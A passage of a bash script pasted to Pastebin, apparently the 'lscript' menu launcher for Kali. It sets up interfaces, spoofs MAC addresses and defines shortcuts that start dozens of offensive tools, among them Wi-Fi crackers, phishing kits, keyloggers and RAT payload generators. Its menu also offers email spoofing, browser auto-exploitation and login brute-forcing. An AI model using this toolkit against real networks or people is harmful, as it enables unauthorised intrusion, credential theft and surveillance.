Advertisement
Guest User

TROUVE

a guest
Jul 9th, 2018
2,821
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 230.07 KB | None | 0 0
  1. #! /bin/bash
  2. VERSION=2.1.4
  3. #Number of tools with keyboard shortcut support
  4. HOWMANYTOOLS=47
  5. BACKL="0"
  6. DONATIONS=5
  7. LATESTCHANGELOGLINES=30
  8. cd
  9. #############DEFAULTS###############
  10. function defaults_l
  11. {
  12. #path for lscript
  13. LPATH="/root/lscript"
  14. export LPATH
  15. #path for keyboard shortcuts
  16. KSPATH=""$LPATH"/ks"
  17. export KSPATH
  18. #making sure the kspath is set
  19. if [[ ! -d "$KSPATH" ]]
  20. then
  21. mkdir "$KSPATH"
  22. fi
  23. #ALFA SUPPORT SETTING
  24. if [[ -f "$LPATH"/settings/AWUS036ACH.txt ]]
  25. then
  26. read ALFA < "$LPATH"/settings/AWUS036ACH.txt
  27. else
  28. ALFA="no"
  29. fi
  30. #yellow start
  31. YS="\e[1;33m"
  32. #blue start
  33. BS="\e[0;34m"
  34. #color end
  35. CE="\e[0m"
  36. #red start
  37. RS="\e[1;31m"
  38. #black start
  39. BLS="\e[0;30m"
  40. #dark gray start
  41. DGYS="\e[1;30m"
  42. #light blue start
  43. LBS="\e[1;34m"
  44. #green start
  45. GNS="\e[0;32m"
  46. #light green start
  47. LGNS="\e[1;32m"
  48. #cyan start
  49. CYS="\e[0;36m"
  50. #light cyan start
  51. LCYS="\e[1;36m"
  52. #light red start
  53. DRS="\e[0;31m"
  54. #purple start
  55. PS="\e[0;35m"
  56. #light purple start
  57. LPS="\e[1;35m"
  58. #brown start
  59. BRS="\e[0;33m"
  60. #light gray start
  61. LGYS="\e[0;37m"
  62. #white start
  63. WHS="\e[1;37m"
  64. #setting custom color for logo
  65. if [[ -f "$LPATH"/settings/logocolor.txt ]]
  66. then
  67. read COL < "$LPATH"/settings/logocolor.txt
  68. else
  69. COL="$RS"
  70. fi
  71. #setting frequent stings
  72. YNYES="("$YS"y"$CE"/"$YS"n"$CE")("$YS"Enter"$CE"=yes)"
  73. YNNO="("$YS"y"$CE"/"$YS"n"$CE")("$YS"Enter"$CE"=no)"
  74. YNONLY="("$YS"y"$CE"/"$YS"n"$CE")"
  75. PAKT="Press "$YS"any key$CE to"
  76. PAKTC="Press "$YS"any key$CE to continue..."
  77. PAKTGB="Press "$YS"any key$CE to go back..."
  78. TNI=""$RS"Tool is not installed. To install it type '"$CE""$YS"install"$CE""$RS"'."$CE""
  79. #code to read from keyboard without return
  80. READAK="read -n 1"
  81. #default MAC when starting monitor
  82. DEFMAC="00:11:22:33:44:55"
  83.  
  84. wififb="wififb"
  85. }
  86. ##############FUNCTIONS#############
  87. function local_ips()
  88. {
  89. iffile=""$LPATH"/iftemp.txt"
  90. #passing an interface if any
  91. LF="$1"
  92. if [[ "$LF" = "" ]]
  93. then
  94. echo -e ""$BS"Local IPs"$CE": "
  95. TEST=$(ifconfig | grep "$ETH:")
  96. n=0
  97. if [[ $TEST != "" ]]
  98. then
  99. ifconfig "$ETH" > $iffile
  100. LOCALETH=$(cat $iffile | grep " inet " | awk -F "inet " {'print $2'} | cut -d ' ' -f1)
  101. cho=$(is_it_an_ip $LOCALETH)
  102. if [[ "$cho" = 1 ]]
  103. then
  104. echo -e ""$ETH" = "$YS"$LOCALETH"$CE""
  105. n=1
  106. fi
  107. fi
  108. TEST=$(ifconfig | grep "$WLANN:")
  109. if [[ $TEST != "" ]]
  110. then
  111. ifconfig $WLANN > $iffile
  112. LOCALMA=$(cat $iffile | grep " inet " | awk -F "inet " {'print $2'} | cut -d ' ' -f1)
  113. cho=$(is_it_an_ip $LOCALMA)
  114. if [[ "$cho" = 1 ]]
  115. then
  116. echo -e "$WLANN = "$YS"$LOCALMA"$CE""
  117. n=1
  118. fi
  119. fi
  120. TEST=$(ifconfig | grep "$WLANNM:")
  121. if [[ $TEST != "" ]]
  122. then
  123. ifconfig $WLANNM > $iffile
  124. LOCALMO=$(cat $iffile | grep " inet " | awk -F "inet " {'print $2'} | cut -d ' ' -f1)
  125. cho=$(is_it_an_ip $LOCALMO)
  126. if [[ "$cho" = 1 ]]
  127. then
  128. echo -e "$WLANNM = "$YS"$LOCALMO"$CE""
  129. n=1
  130. fi
  131. fi
  132. if [[ "$n" = 0 ]]
  133. then
  134. echo -e ""$RS"No known interfaces found available"$CE""
  135. fi
  136. echo -e ""
  137. find_gateways
  138. else
  139. TEST=$(ifconfig | grep "$LF:")
  140. if [[ $TEST != "" ]]
  141. then
  142. ifconfig $LF > $iffile
  143. LOCALM=$(cat $iffile | grep " inet " | awk -F "inet " {'print $2'} | cut -d ' ' -f1)
  144. cho=$(is_it_an_ip $LOCALM)
  145. if [[ "$cho" = 1 ]]
  146. then
  147. OUTPUT="$LOCALM"
  148. echo -e "$OUTPUT"
  149. fi
  150. fi
  151. fi
  152. }
  153. function give_ip_take_zero()
  154. {
  155. #passing an ip
  156. GI1="$1"
  157. GI2="$2"
  158. if [[ "$GI1" = "" ]]
  159. then
  160. echo -e ""$RS"Error 7. No parameters passed"$CE""
  161. sleep 3
  162. else
  163. ip1=$(echo -e "$GI1" | cut -d '.' -f1)
  164. ip2=$(echo -e "$GI1" | cut -d '.' -f2)
  165. ip3=$(echo -e "$GI1" | cut -d '.' -f3)
  166. if [[ "$GI2" = "" ]]
  167. then
  168. OUTPUT=""$ip1"."$ip2"."$ip3".0"
  169. else
  170. OUTPUT=""$ip1"."$ip2"."$ip3"."
  171. fi
  172. echo "$OUTPUT"
  173. fi
  174. }
  175. function is_it_an_ip()
  176. {
  177. IIA=$1
  178. IIAI=${#IIA}
  179. if [[ "$IIA" = "" ]]
  180. then
  181. echo -e ""$RS"Error 9. No parameteres passed"
  182. sleep 2
  183. else
  184. if [[ "$IIAI" -le 15 && "$IIAI" -ge 7 ]]
  185. then
  186. echo 1
  187. else
  188. echo 0
  189. fi
  190. fi
  191. }
  192. function latest_changelog
  193. {
  194. clear
  195. printf '\033]2;LATEST CHANGELOG\a'
  196. echo -e ""$BS"Wellcome to version $VERSION"$CE""
  197. echo -e "What is included in this update: "
  198. cat "$LPATH"/Changelog | head -n $LATESTCHANGELOGLINES
  199. echo -e "$PAKTC"
  200. $READAK
  201. }
  202. function finish
  203. {
  204. echo -e ""$RS"Hard kill detected.."$CE""
  205. }
  206. function dash_calc
  207. {
  208.  
  209. size=${#TERMINALTITLE}
  210. calc=$(( 65-size ))
  211. calc=$(( calc/2 ))
  212. numcalc=1
  213. DASHESN="-"
  214. while [ $numcalc != $calc ]
  215. do
  216. DASHESN=""$DASHESN"-"
  217. numcalc=$(( numcalc+1 ))
  218. done
  219. echo -e "$DASHESN"$RS"$TERMINALTITLE"$CE"$DASHESN"
  220. }
  221. function managed_spaces
  222. {
  223. size=${#WLANN}
  224. calc=$(( 11-size ))
  225. numcalc=1
  226. SPACESN=" "
  227. while [ $numcalc != $calc ]
  228. do
  229. SPACESN=""${SPACESN}" "
  230. numcalc=$(( numcalc+1 ))
  231. done
  232. }
  233. function monitor_spaces
  234. {
  235. size=${#WLANNM}
  236. calc=$(( 11-size ))
  237. numcalc=1
  238. SPACESM=" "
  239. while [ $numcalc != $calc ]
  240. do
  241. SPACESM=""${SPACESM}" "
  242. numcalc=$(( numcalc+1 ))
  243. done
  244. }
  245. function check_wlans
  246. {
  247. CC=$WLANN
  248. WLANCHECKING=$(ifconfig | grep "$WLANN" )
  249. #~ WLANCHECKING=$(ifconfig | awk -v c1="$CC" '$0 ~ c1 {print}')
  250. CC=$WLANNM
  251. WLANMCHECKING=$(ifconfig | grep "$WLANNM" )
  252. #~ WLANMCHECKING=$(ifconfig | awk -v c1="$CC" '$0 ~ c1 {print}')
  253. }
  254. function banner
  255. {
  256. check_wlans
  257. echo -e ""
  258. echo -e "$COL▀▀█▀▀ █▀▀█ █░█ ░▀░$CE v$VERSION"
  259. echo -e "$COL░░█░░ █▄▄█ █▀▄ ▀█▀$CE"
  260. echo -e "$COL░░▀░░ ▀░░▀ ▀░▀ ▀▀▀$CE by "$COL"Taki"
  261. echo -e "$COL█▀▀ █▀▀ █▀▀█ ░▀░ █▀▀█ ▀▀█▀▀$CE"
  262. echo -e "$COL▀▀█ █░░ █▄▄▀ ▀█▀ █░░█ ░░█░░$CE"
  263. echo -e "$COL▀▀▀ ▀▀▀ ▀░▀▀ ▀▀▀ █▀▀▀ ░░▀░░$CE"
  264. echo -e ""$YS"if"$CE") Ifconfig "$YS"l"$CE") Local IPs & gateways "$RS"|"$CE" "$YS"scan"$CE") Arp-scan network"
  265. if [[ "$WLANCHECKING" = "" ]]
  266. then
  267. echo -e ""$RS" 1"$CE") Enable "$RS"$WLANN"$CE"${SPACESN}"$RS"d1"$CE") Disable "$RS"$WLANN"$CE"${SPACESN} "$RS"|"$CE" "$YS"start"$CE") Start monitor mode"
  268. echo -e ""$RS" 2"$CE") Enable "$RS"$WLANNM"$CE"${SPACESM}"$RS"d2"$CE") Disable "$RS"$WLANNM"$CE"${SPACESM} "$RS"|"$CE" "$YS"stop"$CE") Stop monitor mode"
  269. else
  270. echo -e ""$YS" 1"$CE") Enable $WLANN${SPACESN}"$YS"d1"$CE") Disable $WLANN${SPACESN} "$RS"|"$CE" "$YS"start"$CE") Start monitor mode"
  271. echo -e ""$YS" 2"$CE") Enable $WLANNM${SPACESM}"$YS"d2"$CE") Disable $WLANNM${SPACESM} "$RS"|"$CE" "$YS"stop"$CE") Stop monitor mode"
  272. fi
  273. echo -e ""$YS" 3"$CE") Change MAC "$YS"d3"$CE") Restore original MAC "$RS"|"$CE""$YS"update"$CE") Check for updates"
  274. if [[ -f /usr/bin/anonym8 ]]
  275. then
  276. echo -e ""$YS" 4"$CE") Enable anonym8 "$YS"d4"$CE") Disable anonym8 "$RS"|"$CE""$YS"errors"$CE") Fix some errors"
  277. else
  278. echo -e ""$RS" 4"$CE") Enable anonym8 "$RS"d4"$CE") Disable anonym8 "$RS"|"$CE""$YS"errors"$CE") Fix some errors"
  279. fi
  280. if [[ -f /usr/bin/anonsurf ]]
  281. then
  282. echo -e ""$YS" 5"$CE") Enable anonsurf "$YS"d5"$CE") Disable anonsurf "$RS"|"$CE" "$YS"ks"$CE") Keyboard shortucts"
  283. echo -e ""$YS" 6"$CE") Anonsurf's status "$YS"d6"$CE") Restart anonsurf "$RS"|"$CE""$YS" d"$CE") Buy me a coffee"
  284. else
  285. echo -e ""$RS" 5"$CE") Enable anonsurf "$RS"d5"$CE") Disable anonsurf "$RS"|"$CE" "$YS"ks"$CE") Keyboard shortucts"
  286. echo -e ""$RS" 6"$CE") Anonsurf's status "$RS"d6"$CE") Restart anonsurf "$RS"|"$CE" "$YS"d"$CE") Buy me a coffee"
  287. fi
  288. echo -e ""$YS" 7"$CE") View public IP "$RS"|"$CE" "$YS"s"$CE") Go to settings menu"
  289. echo -e ""$YS" 8"$CE") View MAC"
  290. echo -e ""$YS" 9"$CE") TOOLS "$YS"15"$CE") Spoof EMAIL "$YS"22"$CE") Show bandwidth"
  291. if [[ -f /root/ngrok ]]
  292. then
  293. echo -e ""$YS"10"$CE") Handshake "$YS"16"$CE") Ngrok port forward"
  294. else
  295. echo -e ""$YS"10"$CE") Handshake "$RS"16"$CE") "$RS"Ngrok"$CE" port forward"
  296. fi
  297. if [[ -f /usr/local/bin/howdoi ]]
  298. then
  299. echo -e ""$YS"11"$CE") Find WPS pin "$YS"17"$CE") Ask (Howdoi tool)"
  300. else
  301. echo -e ""$YS"11"$CE") Find WPS pin "$RS"17"$CE") Ask ("$RS"Howdoi"$CE" tool)"
  302. fi
  303. echo -e ""$YS"12"$CE") WEP menu "$YS"18"$CE") Auto-exploit browser"
  304. echo -e ""$YS"13"$CE") MITM "$YS"19"$CE") Geolocate an IP"
  305. echo -e ""$YS"14"$CE") Metasploit "$YS"20"$CE") Bruteforce login"
  306. echo -e ""$YS" 0"$CE") Exit "$YS"21"$CE") Sqlmap automated"
  307. echo "Choose: "
  308. read -e YORNAA
  309. #~ echo "$YORNNA"
  310. #~ history -s "$YORNNA"
  311. clear
  312. }
  313. function enable_wlan
  314. {
  315. O4=0
  316. echo -e "Enabling $WLANN..."
  317. rfkill unblock wifi &> /dev/null; rfkill unblock all &> /dev/null
  318. ifconfig $WLANN up &>/dev/null && echo -e ""$YS"Done"$CE"" && O4=1 || echo -e ""$RS"Error. I can't find your wireless adapter"$CE""
  319. }
  320. function disable_wlan
  321. {
  322. echo -e "Disabling $WLANN..."
  323. rfkill unblock wifi &> /dev/null; rfkill unblock all &> /dev/null
  324. ifconfig $WLANN down &>/dev/null && echo -e ""$YS"Done"$CE"" && O4=1 || echo -e ""$RS"Error. I can't find your wireless adapter."$CE""
  325. }
  326. function interface_selection
  327. {
  328. if [[ "$WLANCHECKING" = "" ]]
  329. then
  330. echo -e ""$RS" 1"$CE") $WLANN"
  331. else
  332. echo -e ""$YS" 1"$CE") $WLANN"
  333. fi
  334. if [[ "$WLANMCHECKING" = "" ]]
  335. then
  336. echo -e ""$RS" 2"$CE") $WLANNM"
  337. else
  338. echo -e ""$YS" 2"$CE") $WLANNM"
  339. fi
  340. echo -e ""$YS" 3"$CE") "$ETH""
  341. echo -e ""$YS" b"$CE") Main menu"
  342. echo -e ""$YS" 0"$CE") EXIT"
  343. echo -e "Choose: "
  344. read -e MYINT
  345. if [[ "$MYINT" = "2" ]]
  346. then
  347. if [[ "$WLANMCHECKING" = "" ]]
  348. then
  349. MYINT="OFF"
  350. else
  351. MYINT="$WLANNM"
  352. fi
  353. elif [[ "$MYINT" = "1" ]]
  354. then
  355. if [[ "$WLANCHECKING" = "" ]]
  356. then
  357. MYINT="OFF"
  358. else
  359. MYINT="$WLANN"
  360. fi
  361. elif [[ "$MYINT" = "0" ]]
  362. then
  363. clear
  364. exit
  365. elif [[ "$MYINT" = "00" || "$MYINT" = "b" ]]
  366. then
  367. exec bash "$0"
  368. elif [[ "$MYINT" = "3" ]]
  369. then
  370. MYINT="$ETH"
  371. else
  372. echo -e "Wrong choice..."
  373. sleep 2
  374. clear
  375. echo -e "EXITING"
  376. sleep 1
  377. exec bash "$0"
  378. fi
  379. export MYINT
  380. }
  381. function change_mac
  382. {
  383. interface_selection
  384. clear
  385. if [[ "$MYINT" = "OFF" ]]
  386. then
  387. echo -e "Interface not available"
  388. sleep 2
  389. else
  390. echo -e "Change it to a random or specific?("$YS"r"$CE"/"$YS"s"$CE")("$YS"Enter"$CE"=r): "
  391. read -e RORS
  392. clear
  393. if [[ "$RORS" != "s" ]]
  394. then
  395. echo -e "Changing mac address of $MYINT to a random one..."
  396. ifconfig $MYINT down
  397. macchanger -r $MYINT
  398. ifconfig $MYINT up
  399. echo -e "Done."
  400. else
  401. echo -e "Enter the MAC you want:"
  402. read -e SMAC
  403. echo -e "Changing mac address of $MYINT to $SMAC..."
  404. ifconfig $MYINT down
  405. macchanger -m $SMAC $MYINT
  406. ifconfig $MYINT up
  407. echo -e "Done."
  408. fi
  409. fi
  410. }
  411. function set_interface_number
  412. {
  413. clear
  414. while true
  415. do
  416. echo -e "Enter the name of your wireless interface when in "$RS"managed"$CE" mode("$YS"Enter"$CE"=wlan0): "
  417. read MANAGED
  418. if [[ "$MANAGED" = "" ]]
  419. then
  420. MANAGED="wlan0"
  421. fi
  422. echo -e "Enter the name of your wireless interface when in "$RS"monitor"$CE" mode("$YS"Enter"$CE"=wlan0mon): "
  423. read MONITOR
  424. if [[ "$MONITOR" = "" ]]
  425. then
  426. MONITOR="wlan0mon"
  427. fi
  428. echo -e "Enter the name of your wired interface("$YS"Enter"$CE"="eth0"): "
  429. read WIRED
  430. if [[ "$WIRED" = "" ]]
  431. then
  432. WIRED="eth0"
  433. fi
  434. echo "$MANAGED" > "$LPATH"/wlan.txt
  435. echo "$MONITOR" > "$LPATH"/wlanmon.txt
  436. echo "$WIRED" > "$LPATH"/eth.txt
  437. echo -e ""$YS"Done"$CE""
  438. sleep 1
  439. clear
  440. echo -e ""$BS"If you want to change it, type "$CE""$YS"interface"$CE""$BS" any time"$CE""
  441. sleep 3
  442. echo -e "$PAKTC"
  443. $READAK
  444. BACKL="1"
  445. break
  446. done
  447. }
  448. function checkifalready
  449. {
  450. GOOD="1"
  451. num=1
  452. while [ $num -le 20 ]
  453. do
  454. if [[ "$CHECKKS" = "$num" ]]
  455. then
  456. GOOD="0"
  457. echo -e ""$RS"This shortcut is already in use by the script."$CE""
  458. sleep 3
  459. fi
  460. num=$(( num+1 ))
  461. done
  462. if [[ "$GOOD" = "1" ]]
  463. then
  464. if [[ "$CHECKKS" = "etercheck" || "$CHECKKS" = "eternalblue" || "$CHECKKS" = "changelog" || "$CHECKKS" = "wififb" || "$CHECKKS" = "nessusstop" || "$CHECKKS" = "nessusstart" || "$CHECKKS" = "pstop" || "$CHECKKS" = "pstart" || "$CHECKKS" = "astop" || "$CHECKKS" = "astart" || "$CHECKKS" = "settings" || "$CHECKKS" = "donate" || "$CHECKKS" = "d" || "$CHECKKS" = "s" || "$CHECKKS" = "g" || "$CHECKKS" = "l" || "$CHECKKS" = "" || "$CHECKKS" = "if" || "$CHECKKS" = "ifconfig" || "$CHECKKS" = "interfaces" || "$CHECKKS" = "interface" || "$CHECKKS" = "errors" || "$CHECKKS" = "00" || "$CHECKKS" = "exit" || "$CHECKKS" = "update" || "$CHECKKS" = "d1" || "$CHECKKS" = "d2" || "$CHECKKS" = "d3" || "$CHECKKS" = "d4" || "$CHECKKS" = "d5" || "$CHECKKS" = "d6" || "$CHECKKS" = "d7" || "$CHECKKS" = "gg" || "$CHECKKS" = "ks" ]]
  465. then
  466. GOOD="0"
  467. echo -e ""$RS"This shortcut is already in use by the script."$CE""
  468. sleep 3
  469. fi
  470. fi
  471. if [[ "$CHECKKS" = "delete" ]]
  472. then
  473. GOOD="0"
  474. fi
  475. #~ if [[ "$CHECKKS" = "b" || "$CHECKKS" = "back" ]]
  476. #~ then
  477. #~ GOOD="0"
  478. #~ fi
  479. if [[ "$GOOD" = "1" ]]
  480. then
  481. BACKUPTITLE="$TITLE"
  482. BACKUPNN="$nn"
  483. num=1
  484. while [[ $num -le "$HOWMANYTOOLS" ]]
  485. do
  486. nn="$num"
  487. listshortcuts
  488. if [[ -f ""$KSPATH"/"$TITLE"/"$TITLE"ks.txt" ]]
  489. then
  490. read KSIFALREADY < "$KSPATH"/"$TITLE"/"$TITLE"ks.txt
  491. if [[ "$CHECKKS" == "$KSIFALREADY" ]]
  492. then
  493. echo -e ""$RS"Shortcut '"$CHECKKS"' is already in use by "$TITLE""$CE""
  494. GOOD=0
  495. sleep 3
  496. fi
  497. fi
  498. num=$(( num+1 ))
  499. done
  500. nn="$BACKUPNN"
  501. TITLE="$BACKUPTITLE"
  502. fi
  503. clear
  504. }
  505. function createshortcut
  506. {
  507. if [[ ! -d ""$KSPATH"/$TITLE" ]]
  508. then
  509. mkdir "$KSPATH"/"$TITLE"
  510. fi
  511. clear
  512. echo -e "Enter the keyboard shortcut that will open "$TITLE" from lscript's main menu"
  513. echo -e "(e.g: "$YS""$TITLE""$CE")"
  514. echo -e "To delete it , type: "$YS"delete"$CE""
  515. echo -e ""$YS" b"$CE") Go back"
  516. read CHECKKS
  517. if [[ "$CHECKKS" = "back" || "$CHECKKS" = "b" ]]
  518. then
  519. clear
  520. BACKKS=1
  521. break
  522. else
  523. BACKKS=0
  524. if [[ "$BACKKS" == 0 ]]
  525. then
  526. CHECKKSBACKUP="$CHECKKS"
  527. NAMECDBACKUP="$NAMECD"
  528. KSSETBACKUP="$KSSET"
  529. checkifalready
  530. CHECKKS="$CHECKKSBACKUP"
  531. NAMECD="$NAMECDBACKUP"
  532. KSSET="$KSSETBACKUP"
  533. if [[ "$GOOD" = "1" ]]
  534. then
  535. echo -e "Shortcut is ok.Setting it up..."
  536. sleep 1
  537. echo "$CHECKKS" > "$KSPATH"/"$TITLE"/"$TITLE"ks.txt
  538. echo "$NAMECD" > "$KSPATH"/"$TITLE"/"$TITLE".txt
  539. echo "$KSSET" > "$KSPATH"/"$TITLE"/"$TITLE"2.txt
  540. echo -e "Done!"
  541. echo -e "$PAKTGB"
  542. $READAK
  543. clear
  544. #break
  545. else
  546. clear
  547. echo -e "Removing shortcut for "$TITLE"..."
  548. rm -r "$KSPATH"/"$TITLE"
  549. sleep 1
  550. echo -e "Done."
  551. echo -e "$PAKTGB"
  552. $READAK
  553. clear
  554. #break
  555. fi
  556. else
  557. break
  558. fi
  559. fi
  560. }
  561. function listshortcuts
  562. {
  563. EXTRA1=""
  564. if [[ "$nn" = "1" ]]
  565. then
  566. TITLE="Fluxion"
  567. NAMECD="cd /root/fluxion"
  568. KSSET="./fluxion*"
  569. elif [[ "$nn" = "2" ]]
  570. then
  571. TITLE="Zirikatu"
  572. NAMECD="cd /root/zirikatu"
  573. KSSET="./zirikatu.sh"
  574. elif [[ "$nn" = "3" ]]
  575. then
  576. TITLE="Wifite"
  577. NAMECD=""
  578. KSSET="wifite"
  579. elif [[ "$nn" = "4" ]]
  580. then
  581. TITLE="Wifiphisher"
  582. NAMECD=""
  583. KSSET="wifiphisher"
  584. elif [[ "$nn" = "5" ]]
  585. then
  586. TITLE="Zatacker"
  587. NAMECD="cd /root/Zatacker"
  588. KSSET="./ZT.sh"
  589. elif [[ "$nn" = "6" ]]
  590. then
  591. TITLE="Morpheus"
  592. NAMECD="cd /root/morpheus"
  593. KSSET="./morpheus.sh"
  594. elif [[ "$nn" = "7" ]]
  595. then
  596. TITLE="Hakku"
  597. NAMECD="cd /root/hakkuframework"
  598. KSSET="./hakku"
  599. elif [[ "$nn" = "8" ]]
  600. then
  601. TITLE="Trity"
  602. NAMECD=""
  603. KSSET="trity"
  604. elif [[ "$nn" = "9" ]]
  605. then
  606. TITLE="Cupp"
  607. NAMECD="cd /root/cupp"
  608. KSSET="python cupp.py -i"
  609. elif [[ "$nn" = "10" ]]
  610. then
  611. TITLE="Dracnmap"
  612. NAMECD="cd /root/Dracnmap"
  613. KSSET="./dracnmap-v*.sh"
  614. elif [[ "$nn" = "11" ]]
  615. then
  616. TITLE="Fern"
  617. NAMECD=""
  618. KSSET="fern-wifi-cracker"
  619. elif [[ "$nn" = "12" ]]
  620. then
  621. TITLE="KickThemOut"
  622. NAMECD="cd /root/kickthemout"
  623. KSSET="python kickthemout.py"
  624. elif [[ "$nn" = "13" ]]
  625. then
  626. TITLE="Ghost-Phisher"
  627. NAMECD=""
  628. KSSET="ghost-phisher"
  629. elif [[ "$nn" = "14" ]]
  630. then
  631. TITLE="Xerxes"
  632. NAMECD="cd /root/xerxes"
  633. KSSET="./xerxes"
  634. elif [[ "$nn" = "15" ]]
  635. then
  636. TITLE="Katana"
  637. NAMECD=""
  638. KSSET="ktf.console"
  639. elif [[ "$nn" = "16" ]]
  640. then
  641. TITLE="Airgeddon"
  642. NAMECD="cd /root/airgeddon"
  643. KSSET="./airgeddon.sh"
  644. elif [[ "$nn" = "17" ]]
  645. then
  646. TITLE="Websploit"
  647. NAMECD=""
  648. KSSET="websploit"
  649. elif [[ "$nn" = "18" ]]
  650. then
  651. TITLE="BeeLogger"
  652. NAMECD="cd /root/BeeLogger"
  653. KSSET="python bee.py"
  654. elif [[ "$nn" = "19" ]]
  655. then
  656. TITLE="Ezsploit"
  657. NAMECD="cd /root/exsploit"
  658. KSSET="./ezsploit.sh"
  659. elif [[ "$nn" = "20" ]]
  660. then
  661. TITLE="Pupy"
  662. NAMECD="cd /root/pupy/pupy"
  663. KSSET="./pupysh.py"
  664. elif [[ "$nn" = "21" ]]
  665. then
  666. TITLE="TheFatRat"
  667. NAMECD="cd /root/TheFatRat"
  668. KSSET="./fatrat"
  669. elif [[ "$nn" = "22" ]]
  670. then
  671. TITLE="Angry_IP_Scanner"
  672. NAMECD=" "
  673. KSSET="ipscan & disown"
  674. #~ elif [[ "$nn" = "23" ]]
  675. #~ then
  676. #~ TITLE="Sniper"
  677. #~ NAMECD='read -p 'DOMAIN:' DOMAIN'
  678. #~ KSSET="sniper $DOMAIN"
  679. elif [[ "$nn" = "23" ]]
  680. then
  681. TITLE="ReconDog"
  682. NAMECD="cd /root/ReconDog"
  683. KSSET="python dog.py"
  684. elif [[ "$nn" = "24" ]]
  685. then
  686. TITLE="RED_HAWK"
  687. NAMECD="cd /root/RED_HAWK"
  688. KSSET="php rhawk.php"
  689. elif [[ "$nn" = "25" ]]
  690. then
  691. TITLE="Winpayloads"
  692. NAMECD="cd /root/Winpayloads"
  693. KSSET="./WinPayloads.py"
  694. elif [[ "$nn" = "26" ]]
  695. then
  696. TITLE="CHAOS"
  697. NAMECD="cd /root/CHAOS"
  698. KSSET="go run CHAOS.go"
  699. elif [[ "$nn" = "27" ]]
  700. then
  701. TITLE="Routersploit"
  702. NAMECD="cd /root/routersploit"
  703. KSSET="./rsf.py"
  704. elif [[ "$nn" = "28" ]]
  705. then
  706. TITLE="nWatch"
  707. NAMECD="cd /root/nWatch"
  708. KSSET="python nwatch.py"
  709. elif [[ "$nn" = "29" ]]
  710. then
  711. TITLE="Eternal_scanner"
  712. NAMECD="cd /root/eternal_scanner"
  713. KSSET="./escan"
  714. elif [[ "$nn" = "30" ]]
  715. then
  716. TITLE="LALIN"
  717. NAMECD="cd /root/LALIN"
  718. KSSET="./Lalin.sh"
  719. elif [[ "$nn" = "31" ]]
  720. then
  721. TITLE="Shellter"
  722. NAMECD=""
  723. KSSET="shellter"
  724. elif [[ "$nn" = "32" ]]
  725. then
  726. TITLE="Netattack2"
  727. NAMECD="cd /root/netattack2"
  728. KSSET="python2 netattack2.py"
  729. elif [[ "$nn" = "33" ]]
  730. then
  731. TITLE="Operative-framework"
  732. NAMECD="cd /root/operative-framework"
  733. KSSET="python operative.py"
  734. elif [[ "$nn" = "34" ]]
  735. then
  736. TITLE="Koadic"
  737. NAMECD="cd /root/koadic"
  738. KSSET="./koadic"
  739. elif [[ "$nn" = "35" ]]
  740. then
  741. TITLE="Empire"
  742. NAMECD="cd /root/Empire"
  743. KSSET="./empire"
  744. elif [[ "$nn" = "36" ]]
  745. then
  746. TITLE="Meterpreter_Paranoid_Mode"
  747. NAMECD="cd /root/Meterpreter_Paranoid_Mode-SSL"
  748. KSSET="./Meterpreter_Paranoid_Mode.sh"
  749. elif [[ "$nn" = "37" ]]
  750. then
  751. TITLE="Wifi-Pumpkin"
  752. NAMECD=""
  753. KSSET="wifi-pumpkin"
  754. elif [[ "$nn" = "38" ]]
  755. then
  756. TITLE="Veil"
  757. NAMECD="cd /root/Veil"
  758. KSSET="./Veil.py"
  759. elif [[ "$nn" = "39" ]]
  760. then
  761. TITLE="Leviathan"
  762. NAMECD="cd /root/leviathan"
  763. KSSET="python leviathan.py"
  764. elif [[ "$nn" = "40" ]]
  765. then
  766. TITLE="Gloom-Framework"
  767. NAMECD="cd /root/Gloom-Framework"
  768. KSSET="python gloom.py"
  769. elif [[ "$nn" = "41" ]]
  770. then
  771. TITLE="Arcanus"
  772. NAMECD="cd /root/ARCANUS"
  773. KSSET="./ARCANUS"
  774. elif [[ "$nn" = "42" ]]
  775. then
  776. TITLE="LFISuite"
  777. NAMECD="cd /root/LFISuite"
  778. KSSET="python lfisuite.py"
  779. elif [[ "$nn" = "43" ]]
  780. then
  781. TITLE="DKMC"
  782. NAMECD="cd /root/DKMC"
  783. KSSET="python dkmc.py"
  784. elif [[ "$nn" = "44" ]]
  785. then
  786. TITLE="SecHub"
  787. NAMECD=""
  788. KSSET="sechub"
  789. elif [[ "$nn" = "45" ]]
  790. then
  791. TITLE="Beef-xss"
  792. NAMECD="cd /usr/share/beef-xss"
  793. KSSET="./beef"
  794. elif [[ "$nn" = "46" ]]
  795. then
  796. TITLE="Evil-Droid"
  797. NAMECD="cd /root/Evil-Droid"
  798. KSSET="./evil-droid"
  799. elif [[ "$nn" = "47" ]]
  800. then
  801. TITLE="NoSQLMap"
  802. NAMECD="cd /root/NoSQLMap"
  803. KSSET="python nosqlmap.py"
  804. fi
  805. }
  806. function reinstall_tools
  807. {
  808. while true
  809. do
  810. cd
  811. clear
  812. TERMINALTITLE="INSTALL/REINSTALL A TOOL"
  813. dash_calc
  814. printf '\033]2;INSTALL/REINSTALL A TOOL\a'
  815. echo -e "Select a tool to install/reinstall"
  816. echo -e " "$YS"1"$CE") Fluxion "$YS"21"$CE") 4nonimizer "$YS"41"$CE") Infoga "$YS"61"$CE") Wifi-Pumpkin"
  817. echo -e ""$YS" 2"$CE") Wifite "$YS"22"$CE") Openvas "$YS"42"$CE") nWatch "$YS"62"$CE") Veil-Framework"
  818. echo -e ""$YS" 3"$CE") Wifiphisher "$YS"23"$CE") BeeLogger "$YS"43"$CE") Eternal scanner "$YS"63"$CE") Leviathan"
  819. echo -e ""$YS" 4"$CE") Zatacker "$YS"24"$CE") Ezsploit "$YS"44"$CE") Eaphammer "$YS"64"$CE") FakeImageExploiter"
  820. echo -e ""$YS" 5"$CE") Morpheus "$YS"25"$CE") Pupy "$YS"45"$CE") Dagon "$YS"65"$CE") Avet"
  821. echo -e ""$YS" 6"$CE") Osrfconsole "$YS"26"$CE") Zirikatu "$YS"46"$CE") Lalin "$YS"66"$CE") Gloom"
  822. echo -e ""$YS" 7"$CE") Hakku "$YS"27"$CE") WiFi-autopwner"$YS"47"$CE") Knockmail "$YS"67"$CE") Arcanus"
  823. echo -e ""$YS" 8"$CE") Trity "$YS"28"$CE") Bully "$YS"48"$CE") Kwetza "$YS"68"$CE") MSFPC"
  824. echo -e ""$YS" 9"$CE") Cupp "$YS"29"$CE") Anonsurf "$YS"49"$CE") Ngrok "$YS"69"$CE") MorphHTA"
